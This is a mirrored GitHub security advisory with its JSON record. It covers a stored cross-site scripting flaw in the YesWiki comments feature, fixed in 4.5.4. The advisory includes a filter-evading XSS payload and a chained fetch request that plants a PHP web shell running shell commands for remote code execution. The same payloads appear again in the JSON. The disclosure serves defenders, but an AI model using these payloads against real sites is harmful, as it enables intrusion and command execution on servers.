ghsa-59x8-cvxh-3mm4
Vulnerability from github
Summary
A stored cross-site scripting (XSS) vulnerability was discovered in the application’s comments feature. This issue allows a malicious actor to inject JavaScript payloads that are stored and later executed in the browser of any user viewing the affected comment.
The XSS occurs because the application fails to properly sanitize or encode user input submitted to the comments. Notably, the application sanitizes or does not allow execution of <script>
tags, but does not account for payloads obfuscated using JavaScript block comments like /* JavaScriptPayload */
.
PoC
Navigate to a site and page that allows comments and place this in the comments section and submit it:
/*<script>alert('pizzapower')</script>*/
Upon submitting to the page, it will run. And then upon every page visit, it will run.
Impact
An attacker can run arbitrary JS in the victim's browser (any user that visits the page with the comments). This can be chained to do many malicious actions, such as to achieve RCE when chained with another vulnerability, e.g.:
/*<script>fetch("/?api/templates/custom-presets/anhtyjik.php",{method:"POST",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serif"});</script>*/
Then you can visit http://localhost:8085/custom/css-presets/anhtyjik.php?cmd=id
and see the output of the ID command.
{ "affected": [ { "database_specific": { "last_known_affected_version_range": "\u003c= 4.5.3" }, "package": { "ecosystem": "Packagist", "name": "yeswiki/yeswiki" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "4.5.4" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-46346" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:49:12Z", "nvd_published_at": null, "severity": "LOW" }, "details": "### Summary\n\nA stored cross-site scripting (XSS) vulnerability was discovered in the application\u2019s comments feature. This issue allows a malicious actor to inject JavaScript payloads that are stored and later executed in the browser of any user viewing the affected comment.\n\nThe XSS occurs because the application fails to properly sanitize or encode user input submitted to the comments. Notably, the application sanitizes or does not allow execution of `\u003cscript\u003e` tags, but does not account for payloads obfuscated using JavaScript block comments like `/* JavaScriptPayload */`. \n\n### PoC\nNavigate to a site and page that allows comments and place this in the comments section and submit it: \n\n`/*\u003cscript\u003ealert(\u0027pizzapower\u0027)\u003c/script\u003e*/`\n\nUpon submitting to the page, it will run. And then upon every page visit, it will run. \n\n### Impact\n\nAn attacker can run arbitrary JS in the victim\u0027s browser (any user that visits the page with the comments). This can be chained to do many malicious actions, such as to achieve RCE when chained with another vulnerability, e.g.: \n\n```\n/*\u003cscript\u003efetch(\"/?api/templates/custom-presets/anhtyjik.php\",{method:\"POST\",headers:{\"Content-Type\":\"application/x-www-form-urlencoded\"},body:\"primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E\u0026secondary-color-1=%23d8604c\u0026secondary-color-2=%23d78958\u0026neutral-color=%234e5056\u0026neutral-soft-color=%2357575c\u0026neutral-light-color=%23f2f2f2\u0026main-text-fontsize=17px\u0026main-text-fontfamily=%22Nunito%22%2C+sans-serif\u0026main-title-fontfamily=\u0027Nunito\u0027%2C+sans-serif\"});\u003c/script\u003e*/\n```\n\nThen you can visit `http://localhost:8085/custom/css-presets/anhtyjik.php?cmd=id` and see the output of the ID command.", "id": "GHSA-59x8-cvxh-3mm4", "modified": "2025-04-29T14:49:12Z", "published": "2025-04-29T14:49:12Z", "references": [ { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-59x8-cvxh-3mm4" }, { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/commit/0d4efc880a727599fa4f6d7a64cc967afe475530" }, { "type": "PACKAGE", "url": "https://github.com/YesWiki/yeswiki" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P", "type": "CVSS_V4" } ], "summary": "YesWiki Stored XSS Vulnerability in Comments " }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.